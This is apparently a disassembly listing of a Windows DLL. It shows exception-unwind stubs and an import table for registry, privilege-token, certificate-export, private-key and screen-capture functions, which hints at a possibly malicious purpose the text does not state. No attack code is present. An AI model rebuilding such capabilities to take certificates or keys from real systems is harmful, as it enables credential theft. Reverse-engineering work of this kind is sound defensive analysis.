sub_1001CE5E endp
; =============== S U B R O U T I N E =======================================
sub_1001CE6A proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-158h]
call sub_1000DA70
retn
sub_1001CE6A endp
; =============== S U B R O U T I N E =======================================
sub_1001CE76 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-188h]
call sub_1000DA90
retn
sub_1001CE76 endp
; =============== S U B R O U T I N E =======================================
sub_1001CE82 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-178h]
call sub_1000DA70
retn
sub_1001CE82 endp
; =============== S U B R O U T I N E =======================================
sub_1001CE8E proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-100h]
call sub_1000E1D0
retn
sub_1001CE8E endp
; =============== S U B R O U T I N E =======================================
sub_1001CE9A proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-0F4h]
call sub_1000E1D0
retn
sub_1001CE9A endp
; =============== S U B R O U T I N E =======================================
sub_1001CEA6 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-10Ch]
call sub_1000D620
retn
sub_1001CEA6 endp
; =============== S U B R O U T I N E =======================================
sub_1001CEB2 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-0F0h]
call sub_1000D620
retn
sub_1001CEB2 endp
; =============== S U B R O U T I N E =======================================
sub_1001CEBE proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-108h]
call sub_1000D620
retn
sub_1001CEBE endp
; =============== S U B R O U T I N E =======================================
sub_1001CECA proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-0FCh]
call sub_1000D620
retn
sub_1001CECA endp
; =============== S U B R O U T I N E =======================================
sub_1001CED6 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-104h]
call sub_1000D620
retn
sub_1001CED6 endp
; =============== S U B R O U T I N E =======================================
sub_1001CEE2 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-0F8h]
call sub_1000D620
retn
sub_1001CEE2 endp
; =============== S U B R O U T I N E =======================================
sub_1001CEEE proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-19Ch]
call sub_1000D620
retn
sub_1001CEEE endp
; =============== S U B R O U T I N E =======================================
sub_1001CEFA proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-118h]
call sub_1000E1D0
retn
sub_1001CEFA endp
; =============== S U B R O U T I N E =======================================
sub_1001CF06 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-114h]
call sub_1000E1D0
retn
sub_1001CF06 endp
; =============== S U B R O U T I N E =======================================
sub_1001CF12 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-11Ch]
call sub_1000D620
retn
sub_1001CF12 endp
; =============== S U B R O U T I N E =======================================
sub_1001CF1E proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-120h]
call sub_1000D620
retn
sub_1001CF1E endp
; =============== S U B R O U T I N E =======================================
sub_1001CF2A proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-128h]
call sub_1000D620
retn
sub_1001CF2A endp
; =============== S U B R O U T I N E =======================================
sub_1001CF36 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-124h]
call sub_1000D620
retn
sub_1001CF36 endp
; =============== S U B R O U T I N E =======================================
sub_1001CF42 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-1CCh]
call sub_1000D620
retn
sub_1001CF42 endp
; =============== S U B R O U T I N E =======================================
sub_1001CF4E proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-1E0h]
call sub_1000D620
retn
sub_1001CF4E endp
; =============== S U B R O U T I N E =======================================
sub_1001CF5A proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-220h]
call sub_1000D620
retn
sub_1001CF5A endp
; =============== S U B R O U T I N E =======================================
SEH_10003786 proc near ; DATA XREF: sub_10003786+5�o
mov eax, offset stru_1001FC70
jmp __CxxFrameHandler
SEH_10003786 endp
; =============== S U B R O U T I N E =======================================
SEH_10005BE3 proc near ; DATA XREF: sub_10005BE3+5�o
mov eax, offset stru_1001FD50
jmp __CxxFrameHandler
SEH_10005BE3 endp
; =============== S U B R O U T I N E =======================================
SEH_10005E66 proc near ; DATA XREF: sub_10005E66+5�o
mov eax, offset stru_1001FDA8
jmp __CxxFrameHandler
SEH_10005E66 endp
; =============== S U B R O U T I N E =======================================
SEH_10006547 proc near ; DATA XREF: StartAddress+5�o
mov eax, offset stru_1001FE00
jmp __CxxFrameHandler
SEH_10006547 endp
; =============== S U B R O U T I N E =======================================
sub_1001CF8E proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp+8]
call sub_1001A728
retn
sub_1001CF8E endp
; =============== S U B R O U T I N E =======================================
sub_1001CF97 proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-14h]
call sub_1001A728
retn
sub_1001CF97 endp
; =============== S U B R O U T I N E =======================================
sub_1001CFA0 proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-18h]
call sub_1001A728
retn
sub_1001CFA0 endp
; =============== S U B R O U T I N E =======================================
sub_1001CFA9 proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-1Ch]
call sub_1001A728
retn
sub_1001CFA9 endp
; =============== S U B R O U T I N E =======================================
sub_1001CFB2 proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-2Ch]
call sub_1001A728
retn
sub_1001CFB2 endp
; =============== S U B R O U T I N E =======================================
sub_1001CFBB proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-3Ch]
call sub_1001A728
retn
sub_1001CFBB endp
; =============== S U B R O U T I N E =======================================
sub_1001CFC4 proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-40h]
call sub_1001A728
retn
sub_1001CFC4 endp
; =============== S U B R O U T I N E =======================================
sub_1001CFCD proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-44h]
call sub_1001A728
retn
sub_1001CFCD endp
; =============== S U B R O U T I N E =======================================
sub_1001CFD6 proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-48h]
call sub_1001A728
retn
sub_1001CFD6 endp
; =============== S U B R O U T I N E =======================================
sub_1001CFDF proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-4Ch]
call sub_1001A728
retn
sub_1001CFDF endp
; =============== S U B R O U T I N E =======================================
sub_1001CFE8 proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-50h]
call sub_1001A728
retn
sub_1001CFE8 endp
; =============== S U B R O U T I N E =======================================
sub_1001CFF1 proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-60h]
call sub_1001A728
retn
sub_1001CFF1 endp
; =============== S U B R O U T I N E =======================================
sub_1001CFFA proc near ; DATA XREF: .rdata:stru_1001FE58�o
lea ecx, [ebp-64h]
call sub_1001A728
retn
sub_1001CFFA endp
; =============== S U B R O U T I N E =======================================
SEH_1000827F proc near ; DATA XREF: sub_1000827F+5�o
mov eax, offset stru_1001FE58
jmp __CxxFrameHandler
SEH_1000827F endp
; =============== S U B R O U T I N E =======================================
sub_1001D00D proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-14h]
call sub_1001A728
retn
sub_1001D00D endp
; =============== S U B R O U T I N E =======================================
sub_1001D016 proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-10h]
call sub_1001A728
retn
sub_1001D016 endp
; =============== S U B R O U T I N E =======================================
sub_1001D01F proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-254h]
call sub_1001A728
retn
sub_1001D01F endp
; =============== S U B R O U T I N E =======================================
sub_1001D02B proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-258h]
call sub_1001A728
retn
sub_1001D02B endp
; =============== S U B R O U T I N E =======================================
sub_1001D037 proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-260h]
call sub_1001A728
retn
sub_1001D037 endp
; =============== S U B R O U T I N E =======================================
sub_1001D043 proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-26Ch]
call sub_1001A728
retn
sub_1001D043 endp
; =============== S U B R O U T I N E =======================================
sub_1001D04F proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-278h]
call sub_1001A728
retn
sub_1001D04F endp
; =============== S U B R O U T I N E =======================================
sub_1001D05B proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-2A4h]
call sub_1001A728
retn
sub_1001D05B endp
; =============== S U B R O U T I N E =======================================
sub_1001D067 proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-2B0h]
call sub_1001A728
retn
sub_1001D067 endp
; =============== S U B R O U T I N E =======================================
sub_1001D073 proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-2B8h]
call sub_1001A728
retn
sub_1001D073 endp
; =============== S U B R O U T I N E =======================================
sub_1001D07F proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-2C0h]
call sub_1001A728
retn
sub_1001D07F endp
; =============== S U B R O U T I N E =======================================
sub_1001D08B proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-2C8h]
call sub_1001A728
retn
sub_1001D08B endp
; =============== S U B R O U T I N E =======================================
sub_1001D097 proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-2E4h]
call sub_1001A728
retn
sub_1001D097 endp
; =============== S U B R O U T I N E =======================================
sub_1001D0A3 proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-300h]
call sub_1001A728
retn
sub_1001D0A3 endp
; =============== S U B R O U T I N E =======================================
sub_1001D0AF proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-30Ch]
call sub_1001A728
retn
sub_1001D0AF endp
; =============== S U B R O U T I N E =======================================
sub_1001D0BB proc near ; DATA XREF: .rdata:stru_1001FEE0�o
lea ecx, [ebp-318h]
call sub_1001A728
retn
sub_1001D0BB endp
; =============== S U B R O U T I N E =======================================
SEH_1000878F proc near ; DATA XREF: sub_1000878F+5�o
mov eax, offset stru_1001FEE0
jmp __CxxFrameHandler
SEH_1000878F endp
; =============== S U B R O U T I N E =======================================
sub_1001D0D1 proc near ; DATA XREF: .rdata:stru_1001FF80�o
lea ecx, [ebp-2BCh]
call sub_1001A728
retn
sub_1001D0D1 endp
; =============== S U B R O U T I N E =======================================
sub_1001D0DD proc near ; DATA XREF: .rdata:stru_1001FF80�o
lea ecx, [ebp-8D8h]
call sub_1001A728
retn
sub_1001D0DD endp
; =============== S U B R O U T I N E =======================================
sub_1001D0E9 proc near ; DATA XREF: .rdata:stru_1001FF80�o
lea ecx, [ebp-8DCh]
call sub_1001A728
retn
sub_1001D0E9 endp
; =============== S U B R O U T I N E =======================================
sub_1001D0F5 proc near ; DATA XREF: .rdata:stru_1001FF80�o
lea ecx, [ebp-8E0h]
call sub_1001A728
retn
sub_1001D0F5 endp
; =============== S U B R O U T I N E =======================================
sub_1001D101 proc near ; DATA XREF: .rdata:stru_1001FF80�o
lea ecx, [ebp-8E4h]
call sub_1001A728
retn
sub_1001D101 endp
; =============== S U B R O U T I N E =======================================
sub_1001D10D proc near ; DATA XREF: .rdata:stru_1001FF80�o
lea ecx, [ebp-8E8h]
call sub_1001A728
retn
sub_1001D10D endp
; =============== S U B R O U T I N E =======================================
SEH_1000A318 proc near ; DATA XREF: sub_1000A318+5�o
mov eax, offset stru_1001FF80
jmp __CxxFrameHandler
SEH_1000A318 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001D130 proc near ; DATA XREF: .rdata:stru_1001FFD0�o
mov eax, [ebp-18h]
push eax
call sub_1000D1F0
pop ecx
retn
sub_1001D130 endp
; =============== S U B R O U T I N E =======================================
SEH_1000D200 proc near ; DATA XREF: sub_1000D200+5�o
mov eax, offset stru_1001FFD0
jmp __CxxFrameHandler
SEH_1000D200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001D150 proc near ; DATA XREF: .rdata:stru_1001FFF8�o
mov ecx, [ebp-14h]
call sub_1000D1A0
retn
sub_1001D150 endp
; =============== S U B R O U T I N E =======================================
SEH_1000D300 proc near ; DATA XREF: strstreambuf::strstreambuf(char *,int,char *)+5�o
mov eax, offset stru_1001FFF8
jmp __CxxFrameHandler
SEH_1000D300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001D170 proc near ; DATA XREF: .rdata:stru_10020020�o
mov eax, [ebp-1Ch]
push eax
call sub_1000D1F0
pop ecx
retn
sub_1001D170 endp
; =============== S U B R O U T I N E =======================================
SEH_1000D410 proc near ; DATA XREF: sub_1000D410+5�o
mov eax, offset stru_10020020
jmp __CxxFrameHandler
SEH_1000D410 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001D190 proc near ; DATA XREF: .rdata:stru_10020048�o
mov ecx, [ebp-10h]
call sub_1000D1A0
retn
sub_1001D190 endp
; =============== S U B R O U T I N E =======================================
SEH_1000D4E0 proc near ; DATA XREF: std::strstreambuf::strstreambuf(char *,int,char *)+5�o
mov eax, offset stru_10020048
jmp __CxxFrameHandler
SEH_1000D4E0 endp
; ---------------------------------------------------------------------------
align 10h
; [0000000B BYTES: COLLAPSED FUNCTION unknown_libname_2. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION SEH_1000D590. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000B BYTES: COLLAPSED FUNCTION unknown_libname_3. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION SEH_1000DB80. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
SEH_10013E02 proc near ; DATA XREF: sub_10013E02+5�o
mov eax, offset stru_100200C0
jmp __CxxFrameHandler
SEH_10013E02 endp
; =============== S U B R O U T I N E =======================================
SEH_100142FF proc near ; DATA XREF: sub_100142FF+5�o
mov eax, offset stru_10020118
jmp __CxxFrameHandler
SEH_100142FF endp
; =============== S U B R O U T I N E =======================================
SEH_10014769 proc near ; DATA XREF: sub_10014769+5�o
mov eax, offset stru_10020170
jmp __CxxFrameHandler
SEH_10014769 endp
; =============== S U B R O U T I N E =======================================
SEH_10014871 proc near ; DATA XREF: sub_10014871+5�o
mov eax, offset stru_100201C8
jmp __CxxFrameHandler
SEH_10014871 endp
; =============== S U B R O U T I N E =======================================
SEH_10014916 proc near ; DATA XREF: sub_10014916+5�o
mov eax, offset stru_10020220
jmp __CxxFrameHandler
SEH_10014916 endp
; =============== S U B R O U T I N E =======================================
SEH_10014B0F proc near ; DATA XREF: sub_10014B0F+5�o
mov eax, offset stru_10020278
jmp __CxxFrameHandler
SEH_10014B0F endp
; =============== S U B R O U T I N E =======================================
SEH_10015BF1 proc near ; DATA XREF: sub_10015BF1+5�o
mov eax, offset stru_100202D0
jmp __CxxFrameHandler
SEH_10015BF1 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1001D238 proc near ; DATA XREF: .rdata:stru_10020328�o
lea ecx, [ebp-24h]
jmp sub_1001A728
sub_1001D238 endp
; ---------------------------------------------------------------------------
loc_1001D240: ; DATA XREF: sub_10018AC6�o
mov eax, offset stru_10020328
jmp __CxxFrameHandler
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1001D24C proc near ; DATA XREF: .rdata:stru_10020350�o
lea ecx, [ebp+10h]
jmp sub_1001A728
sub_1001D24C endp
; ---------------------------------------------------------------------------
loc_1001D254: ; DATA XREF: sub_1001936C�o
mov eax, offset stru_10020350
jmp __CxxFrameHandler
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001D260 proc near ; DATA XREF: .rdata:stru_10020378�o
lea ecx, [ebp-1Ch]
jmp sub_1001A728
sub_1001D260 endp
; =============== S U B R O U T I N E =======================================
sub_1001D268 proc near ; DATA XREF: .rdata:stru_10020378�o
lea ecx, [ebp-30h]
jmp sub_1001A728
sub_1001D268 endp
; =============== S U B R O U T I N E =======================================
sub_1001D270 proc near ; DATA XREF: .rdata:stru_10020378�o
lea ecx, [ebp-34h]
jmp sub_1001A728
sub_1001D270 endp
; ---------------------------------------------------------------------------
loc_1001D278: ; DATA XREF: sub_10019709�o
mov eax, offset stru_10020378
jmp __CxxFrameHandler
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1001D284 proc near ; DATA XREF: .rdata:stru_100203B0�o
mov eax, [ebp-18h]
and eax, 1
test eax, eax
jz locret_1001D29A
mov ecx, [ebp+8]
jmp sub_1001A728
; ---------------------------------------------------------------------------
locret_1001D29A: ; CODE XREF: sub_1001D284+8�j
retn
sub_1001D284 endp
; =============== S U B R O U T I N E =======================================
sub_1001D29B proc near ; DATA XREF: .rdata:stru_100203B0�o
lea ecx, [ebp+0Ch]
jmp sub_1001A728
sub_1001D29B endp
; =============== S U B R O U T I N E =======================================
sub_1001D2A3 proc near ; DATA XREF: .rdata:stru_100203B0�o
lea ecx, [ebp-10h]
jmp sub_1001A728
sub_1001D2A3 endp
; =============== S U B R O U T I N E =======================================
sub_1001D2AB proc near ; DATA XREF: .rdata:stru_100203B0�o
lea ecx, [ebp-10h]
jmp sub_1001A728
sub_1001D2AB endp
; =============== S U B R O U T I N E =======================================
sub_1001D2B3 proc near ; DATA XREF: .rdata:stru_100203B0�o
lea ecx, [ebp-1Ch]
jmp sub_1001A728
sub_1001D2B3 endp
; ---------------------------------------------------------------------------
loc_1001D2BB: ; DATA XREF: sub_10019DAA�o
mov eax, offset stru_100203B0
jmp __CxxFrameHandler
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1001D2C8 proc near ; DATA XREF: .rdata:stru_100203F8�o
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_1001D2DE
mov ecx, [ebp+8]
jmp sub_1001A728
; ---------------------------------------------------------------------------
locret_1001D2DE: ; CODE XREF: sub_1001D2C8+8�j
retn
sub_1001D2C8 endp
; =============== S U B R O U T I N E =======================================
sub_1001D2DF proc near ; DATA XREF: .rdata:stru_100203F8�o
lea ecx, [ebp-18h]
jmp sub_1001A728
sub_1001D2DF endp
; ---------------------------------------------------------------------------
loc_1001D2E7: ; DATA XREF: sub_1001A057�o
mov eax, offset stru_100203F8
jmp __CxxFrameHandler
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 0001E000)
; Virtual size : 00003B5A ( 15194.)
; Section size in file : 00003C00 ( 15360.)
; Offset to raw data for section: 0001C800
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall IsTextUnicode(const void *lpv, int iSize, LPINT lpiResult)
extrn IsTextUnicode:dword ; CODE XREF: sub_10018943+A�p
; DATA XREF: sub_10018943+A�r
; LSTATUS __stdcall RegQueryValueExA(HKEY hKey, LPCSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn RegQueryValueExA:dword ; CODE XREF: sub_100020B5+1F2�p
; sub_100020B5+29B�p ...
; LSTATUS __stdcall RegEnumValueA(HKEY hKey, DWORD dwIndex, LPSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn RegEnumValueA:dword ; CODE XREF: sub_100020B5+173�p
; DATA XREF: sub_100020B5+173�r
; LSTATUS __stdcall RegEnumKeyExA(HKEY hKey, DWORD dwIndex, LPSTR lpName, LPDWORD lpcchName, LPDWORD lpReserved, LPSTR lpClass, LPDWORD lpcchClass, PFILETIME lpftLastWriteTime)
extrn RegEnumKeyExA:dword ; CODE XREF: sub_100020B5+C2�p
; sub_1000B7EF+4D0�p
; DATA XREF: ...
; LSTATUS __stdcall RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult)
extrn RegOpenKeyExA:dword ; CODE XREF: sub_100020B5+36�p
; sub_100020B5+EA�p ...
; LSTATUS __stdcall RegFlushKey(HKEY hKey)
extrn RegFlushKey:dword ; CODE XREF: sub_10002C3D+29F�p
; DATA XREF: sub_10002C3D+29F�r
; LSTATUS __stdcall RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData)
extrn RegSetValueExA:dword ; CODE XREF: sub_10002C3D+139�p
; sub_10002C3D+1AF�p ...
; LSTATUS __stdcall RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, const LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition)
extrn RegCreateKeyExA:dword ; CODE XREF: sub_10002C3D+AD�p
; DATA XREF: sub_10002C3D+AD�r
; BOOL __stdcall AdjustTokenPrivileges(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength)
extrn AdjustTokenPrivileges:dword ; CODE XREF: sub_1000579B+48�p
; DATA XREF: sub_1000579B+48�r
; BOOL __stdcall LookupPrivilegeValueA(LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid)
extrn LookupPrivilegeValueA:dword ; CODE XREF: sub_1000579B+24�p
; DATA XREF: sub_1000579B+24�r
; BOOL __stdcall OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle)
extrn OpenProcessToken:dword ; CODE XREF: sub_1000579B+13�p
; DATA XREF: sub_1000579B+13�r
; LSTATUS __stdcall RegDeleteValueA(HKEY hKey, LPCSTR lpValueName)
extrn RegDeleteValueA:dword ; CODE XREF: sub_1000A318+7D0�p
; sub_1000A318+7E2�p ...
; LSTATUS __stdcall RegDeleteKeyA(HKEY hKey, LPCSTR lpSubKey)
extrn RegDeleteKeyA:dword ; CODE XREF: sub_1000B7EF+4E8�p
; DATA XREF: sub_1000B7EF+4E8�r
; BOOL __stdcall CryptGetProvParam(HCRYPTPROV hProv, DWORD dwParam, BYTE *pbData, DWORD *pdwDataLen, DWORD dwFlags)
extrn CryptGetProvParam:dword ; CODE XREF: .text:1000E4C2�p
; .text:1000E4E5�p
; DATA XREF: ...
; LSTATUS __stdcall RegEnumValueW(HKEY hKey, DWORD dwIndex, LPWSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn RegEnumValueW:dword ; DATA XREF: sub_1000FBCC+3�r
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_100020B5+347�p
; sub_100020B5+359�p ...
;
; Imports from CRYPT32.dll
;
; BOOL __stdcall CertDeleteCertificateFromStore(PCCERT_CONTEXT pCertContext)
extrn CertDeleteCertificateFromStore:dword ; CODE XREF: sub_1000E866+B1�p
; sub_1000E866+CA�p
; DATA XREF: ...
; DWORD __stdcall CertGetNameStringA(PCCERT_CONTEXT pCertContext, DWORD dwType, DWORD dwFlags, void *pvTypePara, LPSTR pszNameString, DWORD cchNameString)
extrn CertGetNameStringA:dword ; CODE XREF: sub_1000E66B+107�p
; sub_1000E866+83�p
; DATA XREF: ...
; BOOL __stdcall CertStrToNameA(DWORD dwCertEncodingType, LPCSTR pszX500, DWORD dwStrType, void *pvReserved, BYTE *pbEncoded, DWORD *pcbEncoded, LPCSTR *ppszError)
extrn CertStrToNameA:dword ; CODE XREF: .text:1000E526�p
; .text:1000E550�p
; DATA XREF: ...
; PCCERT_CONTEXT __stdcall CertCreateSelfSignCertificate(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE hCryptProvOrNCryptKey, PCERT_NAME_BLOB pSubjectIssuerBlob, DWORD dwFlags, PCRYPT_KEY_PROV_INFO pKeyProvInfo, PCRYPT_ALGORITHM_IDENTIFIER pSignatureAlgorithm, PSYSTEMTIME pStartTime, PSYSTEMTIME pEndTime, PCERT_EXTENSIONS pExtensions)
extrn CertCreateSelfSignCertificate:dword ; CODE XREF: .text:1000E582�p
; DATA XREF: .text:1000E582�r
; HCERTSTORE __stdcall CertOpenStore(LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara)
extrn CertOpenStore:dword ; CODE XREF: .text:1000E598�p
; sub_1000E66B+AD�p ...
; BOOL __stdcall CertAddCertificateContextToStore(HCERTSTORE hCertStore, PCCERT_CONTEXT pCertContext, DWORD dwAddDisposition, PCCERT_CONTEXT *ppStoreContext)
extrn CertAddCertificateContextToStore:dword ; CODE XREF: .text:1000E5AD�p
; sub_1000E66B+140�p
; DATA XREF: ...
; BOOL __stdcall PFXExportCertStoreEx(HCERTSTORE hStore, CRYPT_DATA_BLOB *pPFX, LPCWSTR szPassword, void *pvReserved, DWORD dwFlags)
extrn PFXExportCertStoreEx:dword ; CODE XREF: .text:1000E5C3�p
; .text:1000E5EB�p ...
; void __stdcall CryptMemFree(LPVOID pv)
extrn CryptMemFree:dword ; CODE XREF: .text:1000E5F5�p
; DATA XREF: .text:1000E5F5�r
; BOOL __stdcall CertFreeCertificateContext(PCCERT_CONTEXT pCertContext)
extrn CertFreeCertificateContext:dword ; CODE XREF: .text:1000E60B�p
; DATA XREF: .text:1000E60B�r
; HCERTSTORE __stdcall PFXImportCertStore(CRYPT_DATA_BLOB *pPFX, LPCWSTR szPassword, DWORD dwFlags)
extrn PFXImportCertStore:dword ; CODE XREF: .text:1000E45E�p
; DATA XREF: .text:1000E45E�r ...
; PCCERT_CONTEXT __stdcall CertEnumCertificatesInStore(HCERTSTORE hCertStore, PCCERT_CONTEXT pPrevCertContext)
extrn CertEnumCertificatesInStore:dword ; CODE XREF: .text:1000E46D�p
; sub_1000E66B+D5�p ...
; BOOL __stdcall CryptAcquireCertificatePrivateKey(PCCERT_CONTEXT pCert, DWORD dwFlags, void *pvReserved, HCRYPTPROV_OR_NCRYPT_KEY_HANDLE *phCryptProvOrNCryptKey, DWORD *pdwKeySpec, BOOL *pfCallerFreeProvOrNCryptKey)
extrn CryptAcquireCertificatePrivateKey:dword ; CODE XREF: .text:1000E48A�p
; DATA XREF: .text:1000E48A�r
; BOOL __stdcall CertCloseStore(HCERTSTORE hCertStore, DWORD dwFlags)
extrn CertCloseStore:dword ; CODE XREF: .text:1000E496�p
; .text:1000E601�p ...
; LPVOID __stdcall CryptMemAlloc(ULONG cbSize)
extrn CryptMemAlloc:dword ; CODE XREF: .text:1000E3F3�p
; .text:1000E4CC�p ...
;
; Imports from GDI32.dll
;
; HBRUSH __stdcall CreateSolidBrush(COLORREF color)
extrn CreateSolidBrush:dword ; CODE XREF: sub_1000C9DC+27�p
; DATA XREF: sub_1000C9DC+27�r
; HFONT __stdcall CreateFontIndirectA(const LOGFONTA *lplf)
extrn CreateFontIndirectA:dword ; CODE XREF: sub_1000C9DC+77�p
; sub_1000C9DC+C7�p
; DATA XREF: ...
; HDC __stdcall CreateCompatibleDC(HDC hdc)
extrn CreateCompatibleDC:dword ; CODE XREF: sub_1000537C+86�p
; DATA XREF: sub_1000537C+86�r
; COLORREF __stdcall SetTextColor(HDC hdc, COLORREF color)
extrn SetTextColor:dword ; CODE XREF: sub_1000537C+9A�p
; DATA XREF: sub_1000537C+9A�r
; COLORREF __stdcall SetBkColor(HDC hdc, COLORREF color)
extrn SetBkColor:dword ; CODE XREF: sub_1000537C+AB�p
; DATA XREF: sub_1000537C+AB�r
; HBITMAP __stdcall CreateCompatibleBitmap(HDC hdc, int cx, int cy)
extrn CreateCompatibleBitmap:dword ; CODE XREF: sub_1000537C+BD�p
; DATA XREF: sub_1000537C+BD�r
; BOOL __stdcall DeleteDC(HDC hdc)
extrn DeleteDC:dword ; CODE XREF: TimerFunc+CB�p
; DATA XREF: TimerFunc+CB�r
; HGDIOBJ __stdcall SelectObject(HDC hdc, HGDIOBJ h)
extrn SelectObject:dword ; CODE XREF: TimerFunc+B9�p
; sub_10004DAA+7C�p ...
; BOOL __stdcall BitBlt(HDC hdc, int x, int y, int cx, int cy, HDC hdcSrc, int x1, int y1, DWORD rop)
extrn BitBlt:dword ; CODE XREF: sub_1000537C+100�p
; DATA XREF: sub_1000537C+100�r
; BOOL __stdcall DeleteObject(HGDIOBJ ho)
extrn DeleteObject:dword ; CODE XREF: TimerFunc+43E�p
; DATA XREF: TimerFunc+43E�r
;
; Imports from KERNEL32.dll
;
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_100015CE+BB�p
; sub_1000291D+12B�p ...
; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2)
